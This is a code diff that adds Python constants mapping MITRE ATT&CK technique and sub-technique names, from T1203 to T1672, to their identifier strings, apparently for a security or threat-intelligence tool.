+        T1203_EXPLOITATION_FOR_CLIENT_EXECUTION = 'T1203'
+
+        T1204_USER_EXECUTION = 'T1204'
+        T1204_001_MALICIOUS_LINK = 'T1204.001'
+        T1204_002_MALICIOUS_FILE = 'T1204.002'
+        T1204_003_MALICIOUS_IMAGE = 'T1204.003'
+        T1204_004_MALICIOUS_COPY_AND_PASTE = 'T1204.004'
+
+        T1205_TRAFFIC_SIGNALING = 'T1205'
+        T1205_001_PORT_KNOCKING = 'T1205.001'
+        T1205_002_SOCKET_FILTERS = 'T1205.002'
+
+        T1206_SUDO_CACHING = 'T1206'
+
+        T1207_ROGUE_DOMAIN_CONTROLLER = 'T1207'
+
+        T1208_KERBEROASTING = 'T1208'
+
+        T1209_TIME_PROVIDERS = 'T1209'
+
+        T1210_EXPLOITATION_OF_REMOTE_SERVICES = 'T1210'
+
+        T1211_EXPLOITATION_FOR_DEFENSE_EVASION = 'T1211'
+
+        T1212_EXPLOITATION_FOR_CREDENTIAL_ACCESS = 'T1212'
+
+        T1213_DATA_FROM_INFORMATION_REPOSITORIES = 'T1213'
+        T1213_001_CONFLUENCE = 'T1213.001'
+        T1213_002_SHAREPOINT = 'T1213.002'
+        T1213_003_CODE_REPOSITORIES = 'T1213.003'
+        T1213_004_CUSTOMER_RELATIONSHIP_MANAGEMENT_SOFTWARE = 'T1213.004'
+        T1213_005_MESSAGING_APPLICATIONS = 'T1213.005'
+
+        T1214_CREDENTIALS_IN_REGISTRY = 'T1214'
+
+        T1215_KERNEL_MODULES_AND_EXTENSIONS = 'T1215'
+
+        T1216_SYSTEM_SCRIPT_PROXY_EXECUTION = 'T1216'
+        T1216_001_PUBPRN = 'T1216.001'
+        T1216_002_SYNCAPPVPUBLISHINGSERVER = 'T1216.002'
+
+        T1217_BROWSER_INFORMATION_DISCOVERY = 'T1217'
+
+        T1218_SYSTEM_BINARY_PROXY_EXECUTION = 'T1218'
+        T1218_001_COMPILED_HTML_FILE = 'T1218.001'
+        T1218_002_CONTROL_PANEL = 'T1218.002'
+        T1218_003_CMSTP = 'T1218.003'
+        T1218_004_INSTALLUTIL = 'T1218.004'
+        T1218_005_MSHTA = 'T1218.005'
+        T1218_007_MSIEXEC = 'T1218.007'
+        T1218_008_ODBCCONF = 'T1218.008'
+        T1218_009_REGSVCS_REGASM = 'T1218.009'
+        T1218_010_REGSVR32 = 'T1218.010'
+        T1218_011_RUNDLL32 = 'T1218.011'
+        T1218_012_VERCLSID = 'T1218.012'
+        T1218_013_MAVINJECT = 'T1218.013'
+        T1218_014_MMC = 'T1218.014'
+        T1218_015_ELECTRON_APPLICATIONS = 'T1218.015'
+
+        T1219_REMOTE_ACCESS_TOOLS = 'T1219'
+        T1219_001_IDE_TUNNELING = 'T1219.001'
+        T1219_002_REMOTE_DESKTOP_SOFTWARE = 'T1219.002'
+        T1219_003_REMOTE_ACCESS_HARDWARE = 'T1219.003'
+
+        T1220_XSL_SCRIPT_PROCESSING = 'T1220'
+
+        T1221_TEMPLATE_INJECTION = 'T1221'
+
+        T1222_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222'
+        T1222_001_WINDOWS_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222.001'
+        T1222_002_LINUX_AND_MAC_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222.002'
+
+        T1223_COMPILED_HTML_FILE = 'T1223'
+
+        T1480_EXECUTION_GUARDRAILS = 'T1480'
+        T1480_001_ENVIRONMENTAL_KEYING = 'T1480.001'
+        T1480_002_MUTUAL_EXCLUSION = 'T1480.002'
+
+        T1482_DOMAIN_TRUST_DISCOVERY = 'T1482'
+
+        T1483_DOMAIN_GENERATION_ALGORITHMS = 'T1483'
+
+        T1484_DOMAIN_OR_TENANT_POLICY_MODIFICATION = 'T1484'
+        T1484_001_GROUP_POLICY_MODIFICATION = 'T1484.001'
+        T1484_002_TRUST_MODIFICATION = 'T1484.002'
+
+        T1485_DATA_DESTRUCTION = 'T1485'
+        T1485_001_LIFECYCLE_TRIGGERED_DELETION = 'T1485.001'
+
+        T1486_DATA_ENCRYPTED_FOR_IMPACT = 'T1486'
+
+        T1487_DISK_STRUCTURE_WIPE = 'T1487'
+
+        T1488_DISK_CONTENT_WIPE = 'T1488'
+
+        T1489_SERVICE_STOP = 'T1489'
+
+        T1490_INHIBIT_SYSTEM_RECOVERY = 'T1490'
+
+        T1491_DEFACEMENT = 'T1491'
+        T1491_001_INTERNAL_DEFACEMENT = 'T1491.001'
+        T1491_002_EXTERNAL_DEFACEMENT = 'T1491.002'
+
+        T1492_STORED_DATA_MANIPULATION = 'T1492'
+
+        T1493_TRANSMITTED_DATA_MANIPULATION = 'T1493'
+
+        T1494_RUNTIME_DATA_MANIPULATION = 'T1494'
+
+        T1495_FIRMWARE_CORRUPTION = 'T1495'
+
+        T1496_RESOURCE_HIJACKING = 'T1496'
+        T1496_001_COMPUTE_HIJACKING = 'T1496.001'
+        T1496_002_BANDWIDTH_HIJACKING = 'T1496.002'
+        T1496_003_SMS_PUMPING = 'T1496.003'
+        T1496_004_CLOUD_SERVICE_HIJACKING = 'T1496.004'
+
+        T1497_VIRTUALIZATION_SANDBOX_EVASION = 'T1497'
+        T1497_001_SYSTEM_CHECKS = 'T1497.001'
+        T1497_002_USER_ACTIVITY_BASED_CHECKS = 'T1497.002'
+        T1497_003_TIME_BASED_EVASION = 'T1497.003'
+
+        T1498_NETWORK_DENIAL_OF_SERVICE = 'T1498'
+        T1498_001_DIRECT_NETWORK_FLOOD = 'T1498.001'
+        T1498_002_REFLECTION_AMPLIFICATION = 'T1498.002'
+
+        T1499_ENDPOINT_DENIAL_OF_SERVICE = 'T1499'
+        T1499_001_OS_EXHAUSTION_FLOOD = 'T1499.001'
+        T1499_002_SERVICE_EXHAUSTION_FLOOD = 'T1499.002'
+        T1499_003_APPLICATION_EXHAUSTION_FLOOD = 'T1499.003'
+        T1499_004_APPLICATION_OR_SYSTEM_EXPLOITATION = 'T1499.004'
+
+        T1500_COMPILE_AFTER_DELIVERY = 'T1500'
+
+        T1501_SYSTEMD_SERVICE = 'T1501'
+
+        T1502_PARENT_PID_SPOOFING = 'T1502'
+
+        T1503_CREDENTIALS_FROM_WEB_BROWSERS = 'T1503'
+
+        T1504_POWERSHELL_PROFILE = 'T1504'
+
+        T1505_SERVER_SOFTWARE_COMPONENT = 'T1505'
+        T1505_001_SQL_STORED_PROCEDURES = 'T1505.001'
+        T1505_002_TRANSPORT_AGENT = 'T1505.002'
+        T1505_003_WEB_SHELL = 'T1505.003'
+        T1505_004_IIS_COMPONENTS = 'T1505.004'
+        T1505_005_TERMINAL_SERVICES_DLL = 'T1505.005'
+        T1505_006_VSPHERE_INSTALLATION_BUNDLES = 'T1505.006'
+
+        T1506_WEB_SESSION_COOKIE = 'T1506'
+
+        T1514_ELEVATED_EXECUTION_WITH_PROMPT = 'T1514'
+
+        T1518_SOFTWARE_DISCOVERY = 'T1518'
+        T1518_001_SECURITY_SOFTWARE_DISCOVERY = 'T1518.001'
+
+        T1519_EMOND = 'T1519'
+
+        T1522_CLOUD_INSTANCE_METADATA_API = 'T1522'
+
+        T1525_IMPLANT_INTERNAL_IMAGE = 'T1525'
+
+        T1526_CLOUD_SERVICE_DISCOVERY = 'T1526'
+
+        T1527_APPLICATION_ACCESS_TOKEN = 'T1527'
+
+        T1528_STEAL_APPLICATION_ACCESS_TOKEN = 'T1528'
+
+        T1529_SYSTEM_SHUTDOWN_REBOOT = 'T1529'
+
+        T1530_DATA_FROM_CLOUD_STORAGE = 'T1530'
+
+        T1531_ACCOUNT_ACCESS_REMOVAL = 'T1531'
+
+        T1534_INTERNAL_SPEARPHISHING = 'T1534'
+
+        T1535_UNUSED_UNSUPPORTED_CLOUD_REGIONS = 'T1535'
+
+        T1536_REVERT_CLOUD_INSTANCE = 'T1536'
+
+        T1537_TRANSFER_DATA_TO_CLOUD_ACCOUNT = 'T1537'
+
+        T1538_CLOUD_SERVICE_DASHBOARD = 'T1538'
+
+        T1539_STEAL_WEB_SESSION_COOKIE = 'T1539'
+
+        T1542_PRE_OS_BOOT = 'T1542'
+        T1542_001_SYSTEM_FIRMWARE = 'T1542.001'
+        T1542_002_COMPONENT_FIRMWARE = 'T1542.002'
+        T1542_003_BOOTKIT = 'T1542.003'
+        T1542_004_ROMMONKIT = 'T1542.004'
+        T1542_005_TFTP_BOOT = 'T1542.005'
+
+        T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS = 'T1543'
+        T1543_001_LAUNCH_AGENT = 'T1543.001'
+        T1543_002_SYSTEMD_SERVICE = 'T1543.002'
+        T1543_003_WINDOWS_SERVICE = 'T1543.003'
+        T1543_004_LAUNCH_DAEMON = 'T1543.004'
+        T1543_005_CONTAINER_SERVICE = 'T1543.005'
+
+        T1546_EVENT_TRIGGERED_EXECUTION = 'T1546'
+        T1546_001_CHANGE_DEFAULT_FILE_ASSOCIATION = 'T1546.001'
+        T1546_002_SCREENSAVER = 'T1546.002'
+        T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION = 'T1546.003'
+        T1546_004_UNIX_SHELL_CONFIGURATION_MODIFICATION = 'T1546.004'
+        T1546_005_TRAP = 'T1546.005'
+        T1546_006_LC_LOAD_DYLIB_ADDITION = 'T1546.006'
+        T1546_007_NETSH_HELPER_DLL = 'T1546.007'
+        T1546_008_ACCESSIBILITY_FEATURES = 'T1546.008'
+        T1546_009_APPCERT_DLLS = 'T1546.009'
+        T1546_010_APPINIT_DLLS = 'T1546.010'
+        T1546_011_APPLICATION_SHIMMING = 'T1546.011'
+        T1546_012_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION = 'T1546.012'
+        T1546_013_POWERSHELL_PROFILE = 'T1546.013'
+        T1546_014_EMOND = 'T1546.014'
+        T1546_015_COMPONENT_OBJECT_MODEL_HIJACKING = 'T1546.015'
+        T1546_016_INSTALLER_PACKAGES = 'T1546.016'
+        T1546_017_UDEV_RULES = 'T1546.017'
+
+        T1547_BOOT_OR_LOGON_AUTOSTART_EXECUTION = 'T1547'
+        T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER = 'T1547.001'
+        T1547_002_AUTHENTICATION_PACKAGE = 'T1547.002'
+        T1547_003_TIME_PROVIDERS = 'T1547.003'
+        T1547_004_WINLOGON_HELPER_DLL = 'T1547.004'
+        T1547_005_SECURITY_SUPPORT_PROVIDER = 'T1547.005'
+        T1547_006_KERNEL_MODULES_AND_EXTENSIONS = 'T1547.006'
+        T1547_007_RE_OPENED_APPLICATIONS = 'T1547.007'
+        T1547_008_LSASS_DRIVER = 'T1547.008'
+        T1547_009_SHORTCUT_MODIFICATION = 'T1547.009'
+        T1547_010_PORT_MONITORS = 'T1547.010'
+        T1547_011_PLIST_MODIFICATION = 'T1547.011'
+        T1547_012_PRINT_PROCESSORS = 'T1547.012'
+        T1547_013_XDG_AUTOSTART_ENTRIES = 'T1547.013'
+        T1547_014_ACTIVE_SETUP = 'T1547.014'
+        T1547_015_LOGIN_ITEMS = 'T1547.015'
+
+        T1548_ABUSE_ELEVATION_CONTROL_MECHANISM = 'T1548'
+        T1548_001_SETUID_AND_SETGID = 'T1548.001'
+        T1548_002_BYPASS_USER_ACCOUNT_CONTROL = 'T1548.002'
+        T1548_003_SUDO_AND_SUDO_CACHING = 'T1548.003'
+        T1548_004_ELEVATED_EXECUTION_WITH_PROMPT = 'T1548.004'
+        T1548_005_TEMPORARY_ELEVATED_CLOUD_ACCESS = 'T1548.005'
+        T1548_006_TCC_MANIPULATION = 'T1548.006'
+
+        T1550_USE_ALTERNATE_AUTHENTICATION_MATERIAL = 'T1550'
+        T1550_001_APPLICATION_ACCESS_TOKEN = 'T1550.001'
+        T1550_002_PASS_THE_HASH = 'T1550.002'
+        T1550_003_PASS_THE_TICKET = 'T1550.003'
+        T1550_004_WEB_SESSION_COOKIE = 'T1550.004'
+
+        T1552_UNSECURED_CREDENTIALS = 'T1552'
+        T1552_001_CREDENTIALS_IN_FILES = 'T1552.001'
+        T1552_002_CREDENTIALS_IN_REGISTRY = 'T1552.002'
+        T1552_003_BASH_HISTORY = 'T1552.003'
+        T1552_004_PRIVATE_KEYS = 'T1552.004'
+        T1552_005_CLOUD_INSTANCE_METADATA_API = 'T1552.005'
+        T1552_006_GROUP_POLICY_PREFERENCES = 'T1552.006'
+        T1552_007_CONTAINER_API = 'T1552.007'
+        T1552_008_CHAT_MESSAGES = 'T1552.008'
+
+        T1553_SUBVERT_TRUST_CONTROLS = 'T1553'
+        T1553_001_GATEKEEPER_BYPASS = 'T1553.001'
+        T1553_002_CODE_SIGNING = 'T1553.002'
+        T1553_003_SIP_AND_TRUST_PROVIDER_HIJACKING = 'T1553.003'
+        T1553_004_INSTALL_ROOT_CERTIFICATE = 'T1553.004'
+        T1553_005_MARK_OF_THE_WEB_BYPASS = 'T1553.005'
+        T1553_006_CODE_SIGNING_POLICY_MODIFICATION = 'T1553.006'
+
+        T1554_COMPROMISE_HOST_SOFTWARE_BINARY = 'T1554'
+
+        T1555_CREDENTIALS_FROM_PASSWORD_STORES = 'T1555'
+        T1555_001_KEYCHAIN = 'T1555.001'
+        T1555_002_SECURITYD_MEMORY = 'T1555.002'
+        T1555_003_CREDENTIALS_FROM_WEB_BROWSERS = 'T1555.003'
+        T1555_004_WINDOWS_CREDENTIAL_MANAGER = 'T1555.004'
+        T1555_005_PASSWORD_MANAGERS = 'T1555.005'
+        T1555_006_CLOUD_SECRETS_MANAGEMENT_STORES = 'T1555.006'
+
+        T1556_MODIFY_AUTHENTICATION_PROCESS = 'T1556'
+        T1556_001_DOMAIN_CONTROLLER_AUTHENTICATION = 'T1556.001'
+        T1556_002_PASSWORD_FILTER_DLL = 'T1556.002'
+        T1556_003_PLUGGABLE_AUTHENTICATION_MODULES = 'T1556.003'
+        T1556_004_NETWORK_DEVICE_AUTHENTICATION = 'T1556.004'
+        T1556_005_REVERSIBLE_ENCRYPTION = 'T1556.005'
+        T1556_006_MULTI_FACTOR_AUTHENTICATION = 'T1556.006'
+        T1556_007_HYBRID_IDENTITY = 'T1556.007'
+        T1556_008_NETWORK_PROVIDER_DLL = 'T1556.008'
+        T1556_009_CONDITIONAL_ACCESS_POLICIES = 'T1556.009'
+
+        T1557_ADVERSARY_IN_THE_MIDDLE = 'T1557'
+        T1557_001_LLMNR_NBT_NS_POISONING_AND_SMB_RELAY = 'T1557.001'
+        T1557_002_ARP_CACHE_POISONING = 'T1557.002'
+        T1557_003_DHCP_SPOOFING = 'T1557.003'
+        T1557_004_EVIL_TWIN = 'T1557.004'
+
+        T1558_STEAL_OR_FORGE_KERBEROS_TICKETS = 'T1558'
+        T1558_001_GOLDEN_TICKET = 'T1558.001'
+        T1558_002_SILVER_TICKET = 'T1558.002'
+        T1558_003_KERBEROASTING = 'T1558.003'
+        T1558_004_AS_REP_ROASTING = 'T1558.004'
+        T1558_005_CCACHE_FILES = 'T1558.005'
+
+        T1559_INTER_PROCESS_COMMUNICATION = 'T1559'
+        T1559_001_COMPONENT_OBJECT_MODEL = 'T1559.001'
+        T1559_002_DYNAMIC_DATA_EXCHANGE = 'T1559.002'
+        T1559_003_XPC_SERVICES = 'T1559.003'
+
+        T1560_ARCHIVE_COLLECTED_DATA = 'T1560'
+        T1560_001_ARCHIVE_VIA_UTILITY = 'T1560.001'
+        T1560_002_ARCHIVE_VIA_LIBRARY = 'T1560.002'
+        T1560_003_ARCHIVE_VIA_CUSTOM_METHOD = 'T1560.003'
+
+        T1561_DISK_WIPE = 'T1561'
+        T1561_001_DISK_CONTENT_WIPE = 'T1561.001'
+        T1561_002_DISK_STRUCTURE_WIPE = 'T1561.002'
+
+        T1562_IMPAIR_DEFENSES = 'T1562'
+        T1562_001_DISABLE_OR_MODIFY_TOOLS = 'T1562.001'
+        T1562_002_DISABLE_WINDOWS_EVENT_LOGGING = 'T1562.002'
+        T1562_003_IMPAIR_COMMAND_HISTORY_LOGGING = 'T1562.003'
+        T1562_004_DISABLE_OR_MODIFY_SYSTEM_FIREWALL = 'T1562.004'
+        T1562_006_INDICATOR_BLOCKING = 'T1562.006'
+        T1562_007_DISABLE_OR_MODIFY_CLOUD_FIREWALL = 'T1562.007'
+        T1562_008_DISABLE_OR_MODIFY_CLOUD_LOGS = 'T1562.008'
+        T1562_009_SAFE_MODE_BOOT = 'T1562.009'
+        T1562_010_DOWNGRADE_ATTACK = 'T1562.010'
+        T1562_011_SPOOF_SECURITY_ALERTING = 'T1562.011'
+        T1562_012_DISABLE_OR_MODIFY_LINUX_AUDIT_SYSTEM = 'T1562.012'
+
+        T1563_REMOTE_SERVICE_SESSION_HIJACKING = 'T1563'
+        T1563_001_SSH_HIJACKING = 'T1563.001'
+        T1563_002_RDP_HIJACKING = 'T1563.002'
+
+        T1564_HIDE_ARTIFACTS = 'T1564'
+        T1564_001_HIDDEN_FILES_AND_DIRECTORIES = 'T1564.001'
+        T1564_002_HIDDEN_USERS = 'T1564.002'
+        T1564_003_HIDDEN_WINDOW = 'T1564.003'
+        T1564_004_NTFS_FILE_ATTRIBUTES = 'T1564.004'
+        T1564_005_HIDDEN_FILE_SYSTEM = 'T1564.005'
+        T1564_006_RUN_VIRTUAL_INSTANCE = 'T1564.006'
+        T1564_007_VBA_STOMPING = 'T1564.007'
+        T1564_008_EMAIL_HIDING_RULES = 'T1564.008'
+        T1564_009_RESOURCE_FORKING = 'T1564.009'
+        T1564_010_PROCESS_ARGUMENT_SPOOFING = 'T1564.010'
+        T1564_011_IGNORE_PROCESS_INTERRUPTS = 'T1564.011'
+        T1564_012_FILE_PATH_EXCLUSIONS = 'T1564.012'
+        T1564_013_BIND_MOUNTS = 'T1564.013'
+        T1564_014_EXTENDED_ATTRIBUTES = 'T1564.014'
+
+        T1565_DATA_MANIPULATION = 'T1565'
+        T1565_001_STORED_DATA_MANIPULATION = 'T1565.001'
+        T1565_002_TRANSMITTED_DATA_MANIPULATION = 'T1565.002'
+        T1565_003_RUNTIME_DATA_MANIPULATION = 'T1565.003'
+
+        T1566_PHISHING = 'T1566'
+        T1566_001_SPEARPHISHING_ATTACHMENT = 'T1566.001'
+        T1566_002_SPEARPHISHING_LINK = 'T1566.002'
+        T1566_003_SPEARPHISHING_VIA_SERVICE = 'T1566.003'
+        T1566_004_SPEARPHISHING_VOICE = 'T1566.004'
+
+        T1567_EXFILTRATION_OVER_WEB_SERVICE = 'T1567'
+        T1567_001_EXFILTRATION_TO_CODE_REPOSITORY = 'T1567.001'
+        T1567_002_EXFILTRATION_TO_CLOUD_STORAGE = 'T1567.002'
+        T1567_003_EXFILTRATION_TO_TEXT_STORAGE_SITES = 'T1567.003'
+        T1567_004_EXFILTRATION_OVER_WEBHOOK = 'T1567.004'
+
+        T1568_DYNAMIC_RESOLUTION = 'T1568'
+        T1568_001_FAST_FLUX_DNS = 'T1568.001'
+        T1568_002_DOMAIN_GENERATION_ALGORITHMS = 'T1568.002'
+        T1568_003_DNS_CALCULATION = 'T1568.003'
+
+        T1569_SYSTEM_SERVICES = 'T1569'
+        T1569_001_LAUNCHCTL = 'T1569.001'
+        T1569_002_SERVICE_EXECUTION = 'T1569.002'
+        T1569_003_SYSTEMCTL = 'T1569.003'
+
+        T1570_LATERAL_TOOL_TRANSFER = 'T1570'
+
+        T1571_NON_STANDARD_PORT = 'T1571'
+
+        T1572_PROTOCOL_TUNNELING = 'T1572'
+
+        T1573_ENCRYPTED_CHANNEL = 'T1573'
+        T1573_001_SYMMETRIC_CRYPTOGRAPHY = 'T1573.001'
+        T1573_002_ASYMMETRIC_CRYPTOGRAPHY = 'T1573.002'
+
+        T1574_HIJACK_EXECUTION_FLOW = 'T1574'
+        T1574_001_DLL = 'T1574.001'
+        T1574_002_DLL_SIDE_LOADING = 'T1574.002'
+        T1574_004_DYLIB_HIJACKING = 'T1574.004'
+        T1574_005_EXECUTABLE_INSTALLER_FILE_PERMISSIONS_WEAKNESS = 'T1574.005'
+        T1574_006_DYNAMIC_LINKER_HIJACKING = 'T1574.006'
+        T1574_007_PATH_INTERCEPTION_BY_PATH_ENVIRONMENT_VARIABLE = 'T1574.007'
+        T1574_008_PATH_INTERCEPTION_BY_SEARCH_ORDER_HIJACKING = 'T1574.008'
+        T1574_009_PATH_INTERCEPTION_BY_UNQUOTED_PATH = 'T1574.009'
+        T1574_010_SERVICES_FILE_PERMISSIONS_WEAKNESS = 'T1574.010'
+        T1574_011_SERVICES_REGISTRY_PERMISSIONS_WEAKNESS = 'T1574.011'
+        T1574_012_COR_PROFILER = 'T1574.012'
+        T1574_013_KERNELCALLBACKTABLE = 'T1574.013'
+        T1574_014_APPDOMAINMANAGER = 'T1574.014'
+
+        T1578_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE = 'T1578'
+        T1578_001_CREATE_SNAPSHOT = 'T1578.001'
+        T1578_002_CREATE_CLOUD_INSTANCE = 'T1578.002'
+        T1578_003_DELETE_CLOUD_INSTANCE = 'T1578.003'
+        T1578_004_REVERT_CLOUD_INSTANCE = 'T1578.004'
+        T1578_005_MODIFY_CLOUD_COMPUTE_CONFIGURATIONS = 'T1578.005'
+
+        T1580_CLOUD_INFRASTRUCTURE_DISCOVERY = 'T1580'
+
+        T1583_ACQUIRE_INFRASTRUCTURE = 'T1583'
+        T1583_001_DOMAINS = 'T1583.001'
+        T1583_002_DNS_SERVER = 'T1583.002'
+        T1583_003_VIRTUAL_PRIVATE_SERVER = 'T1583.003'
+        T1583_004_SERVER = 'T1583.004'
+        T1583_005_BOTNET = 'T1583.005'
+        T1583_006_WEB_SERVICES = 'T1583.006'
+        T1583_007_SERVERLESS = 'T1583.007'
+        T1583_008_MALVERTISING = 'T1583.008'
+
+        T1584_COMPROMISE_INFRASTRUCTURE = 'T1584'
+        T1584_001_DOMAINS = 'T1584.001'
+        T1584_002_DNS_SERVER = 'T1584.002'
+        T1584_003_VIRTUAL_PRIVATE_SERVER = 'T1584.003'
+        T1584_004_SERVER = 'T1584.004'
+        T1584_005_BOTNET = 'T1584.005'
+        T1584_006_WEB_SERVICES = 'T1584.006'
+        T1584_007_SERVERLESS = 'T1584.007'
+        T1584_008_NETWORK_DEVICES = 'T1584.008'
+
+        T1585_ESTABLISH_ACCOUNTS = 'T1585'
+        T1585_001_SOCIAL_MEDIA_ACCOUNTS = 'T1585.001'
+        T1585_002_EMAIL_ACCOUNTS = 'T1585.002'
+        T1585_003_CLOUD_ACCOUNTS = 'T1585.003'
+
+        T1586_COMPROMISE_ACCOUNTS = 'T1586'
+        T1586_001_SOCIAL_MEDIA_ACCOUNTS = 'T1586.001'
+        T1586_002_EMAIL_ACCOUNTS = 'T1586.002'
+        T1586_003_CLOUD_ACCOUNTS = 'T1586.003'
+
+        T1587_DEVELOP_CAPABILITIES = 'T1587'
+        T1587_001_MALWARE = 'T1587.001'
+        T1587_002_CODE_SIGNING_CERTIFICATES = 'T1587.002'
+        T1587_003_DIGITAL_CERTIFICATES = 'T1587.003'
+        T1587_004_EXPLOITS = 'T1587.004'
+
+        T1588_OBTAIN_CAPABILITIES = 'T1588'
+        T1588_001_MALWARE = 'T1588.001'
+        T1588_002_TOOL = 'T1588.002'
+        T1588_003_CODE_SIGNING_CERTIFICATES = 'T1588.003'
+        T1588_004_DIGITAL_CERTIFICATES = 'T1588.004'
+        T1588_005_EXPLOITS = 'T1588.005'
+        T1588_006_VULNERABILITIES = 'T1588.006'
+        T1588_007_ARTIFICIAL_INTELLIGENCE = 'T1588.007'
+
+        T1589_GATHER_VICTIM_IDENTITY_INFORMATION = 'T1589'
+        T1589_001_CREDENTIALS = 'T1589.001'
+        T1589_002_EMAIL_ADDRESSES = 'T1589.002'
+        T1589_003_EMPLOYEE_NAMES = 'T1589.003'
+
+        T1590_GATHER_VICTIM_NETWORK_INFORMATION = 'T1590'
+        T1590_001_DOMAIN_PROPERTIES = 'T1590.001'
+        T1590_002_DNS = 'T1590.002'
+        T1590_003_NETWORK_TRUST_DEPENDENCIES = 'T1590.003'
+        T1590_004_NETWORK_TOPOLOGY = 'T1590.004'
+        T1590_005_IP_ADDRESSES = 'T1590.005'
+        T1590_006_NETWORK_SECURITY_APPLIANCES = 'T1590.006'
+
+        T1591_GATHER_VICTIM_ORG_INFORMATION = 'T1591'
+        T1591_001_DETERMINE_PHYSICAL_LOCATIONS = 'T1591.001'
+        T1591_002_BUSINESS_RELATIONSHIPS = 'T1591.002'
+        T1591_003_IDENTIFY_BUSINESS_TEMPO = 'T1591.003'
+        T1591_004_IDENTIFY_ROLES = 'T1591.004'
+
+        T1592_GATHER_VICTIM_HOST_INFORMATION = 'T1592'
+        T1592_001_HARDWARE = 'T1592.001'
+        T1592_002_SOFTWARE = 'T1592.002'
+        T1592_003_FIRMWARE = 'T1592.003'
+        T1592_004_CLIENT_CONFIGURATIONS = 'T1592.004'
+
+        T1593_SEARCH_OPEN_WEBSITES_DOMAINS = 'T1593'
+        T1593_001_SOCIAL_MEDIA = 'T1593.001'
+        T1593_002_SEARCH_ENGINES = 'T1593.002'
+        T1593_003_CODE_REPOSITORIES = 'T1593.003'
+
+        T1594_SEARCH_VICTIM_OWNED_WEBSITES = 'T1594'
+
+        T1595_ACTIVE_SCANNING = 'T1595'
+        T1595_001_SCANNING_IP_BLOCKS = 'T1595.001'
+        T1595_002_VULNERABILITY_SCANNING = 'T1595.002'
+        T1595_003_WORDLIST_SCANNING = 'T1595.003'
+
+        T1596_SEARCH_OPEN_TECHNICAL_DATABASES = 'T1596'
+        T1596_001_DNS_PASSIVE_DNS = 'T1596.001'
+        T1596_002_WHOIS = 'T1596.002'
+        T1596_003_DIGITAL_CERTIFICATES = 'T1596.003'
+        T1596_004_CDNS = 'T1596.004'
+        T1596_005_SCAN_DATABASES = 'T1596.005'
+
+        T1597_SEARCH_CLOSED_SOURCES = 'T1597'
+        T1597_001_THREAT_INTEL_VENDORS = 'T1597.001'
+        T1597_002_PURCHASE_TECHNICAL_DATA = 'T1597.002'
+
+        T1598_PHISHING_FOR_INFORMATION = 'T1598'
+        T1598_001_SPEARPHISHING_SERVICE = 'T1598.001'
+        T1598_002_SPEARPHISHING_ATTACHMENT = 'T1598.002'
+        T1598_003_SPEARPHISHING_LINK = 'T1598.003'
+        T1598_004_SPEARPHISHING_VOICE = 'T1598.004'
+
+        T1599_NETWORK_BOUNDARY_BRIDGING = 'T1599'
+        T1599_001_NETWORK_ADDRESS_TRANSLATION_TRAVERSAL = 'T1599.001'
+
+        T1600_WEAKEN_ENCRYPTION = 'T1600'
+        T1600_001_REDUCE_KEY_SPACE = 'T1600.001'
+        T1600_002_DISABLE_CRYPTO_HARDWARE = 'T1600.002'
+
+        T1601_MODIFY_SYSTEM_IMAGE = 'T1601'
+        T1601_001_PATCH_SYSTEM_IMAGE = 'T1601.001'
+        T1601_002_DOWNGRADE_SYSTEM_IMAGE = 'T1601.002'
+
+        T1602_DATA_FROM_CONFIGURATION_REPOSITORY = 'T1602'
+        T1602_001_SNMP_MIB_DUMP = 'T1602.001'
+        T1602_002_NETWORK_DEVICE_CONFIGURATION_DUMP = 'T1602.002'
+
+        T1606_FORGE_WEB_CREDENTIALS = 'T1606'
+        T1606_001_WEB_COOKIES = 'T1606.001'
+        T1606_002_SAML_TOKENS = 'T1606.002'
+
+        T1608_STAGE_CAPABILITIES = 'T1608'
+        T1608_001_UPLOAD_MALWARE = 'T1608.001'
+        T1608_002_UPLOAD_TOOL = 'T1608.002'
+        T1608_003_INSTALL_DIGITAL_CERTIFICATE = 'T1608.003'
+        T1608_004_DRIVE_BY_TARGET = 'T1608.004'
+        T1608_005_LINK_TARGET = 'T1608.005'
+        T1608_006_SEO_POISONING = 'T1608.006'
+
+        T1609_CONTAINER_ADMINISTRATION_COMMAND = 'T1609'
+
+        T1610_DEPLOY_CONTAINER = 'T1610'
+
+        T1611_ESCAPE_TO_HOST = 'T1611'
+
+        T1612_BUILD_IMAGE_ON_HOST = 'T1612'
+
+        T1613_CONTAINER_AND_RESOURCE_DISCOVERY = 'T1613'
+
+        T1614_SYSTEM_LOCATION_DISCOVERY = 'T1614'
+        T1614_001_SYSTEM_LANGUAGE_DISCOVERY = 'T1614.001'
+
+        T1615_GROUP_POLICY_DISCOVERY = 'T1615'
+
+        T1619_CLOUD_STORAGE_OBJECT_DISCOVERY = 'T1619'
+
+        T1620_REFLECTIVE_CODE_LOADING = 'T1620'
+
+        T1621_MULTI_FACTOR_AUTHENTICATION_REQUEST_GENERATION = 'T1621'
+
+        T1622_DEBUGGER_EVASION = 'T1622'
+
+        T1647_PLIST_FILE_MODIFICATION = 'T1647'
+
+        T1648_SERVERLESS_EXECUTION = 'T1648'
+
+        T1649_STEAL_OR_FORGE_AUTHENTICATION_CERTIFICATES = 'T1649'
+
+        T1650_ACQUIRE_ACCESS = 'T1650'
+
+        T1651_CLOUD_ADMINISTRATION_COMMAND = 'T1651'
+
+        T1652_DEVICE_DRIVER_DISCOVERY = 'T1652'
+
+        T1653_POWER_SETTINGS = 'T1653'
+
+        T1654_LOG_ENUMERATION = 'T1654'
+
+        T1656_IMPERSONATION = 'T1656'
+
+        T1657_FINANCIAL_THEFT = 'T1657'
+
+        T1659_CONTENT_INJECTION = 'T1659'
+
+        T1665_HIDE_INFRASTRUCTURE = 'T1665'
+
+        T1666_MODIFY_CLOUD_RESOURCE_HIERARCHY = 'T1666'
+
+        T1667_EMAIL_BOMBING = 'T1667'
+
+        T1668_EXCLUSIVE_CONTROL = 'T1668'
+
+        T1669_WI_FI_NETWORKS = 'T1669'
+
+        T1671_CLOUD_APPLICATION_INTEGRATION = 'T1671'
+
+        T1672_EMAIL_SPOOFING = 'T1672'
+
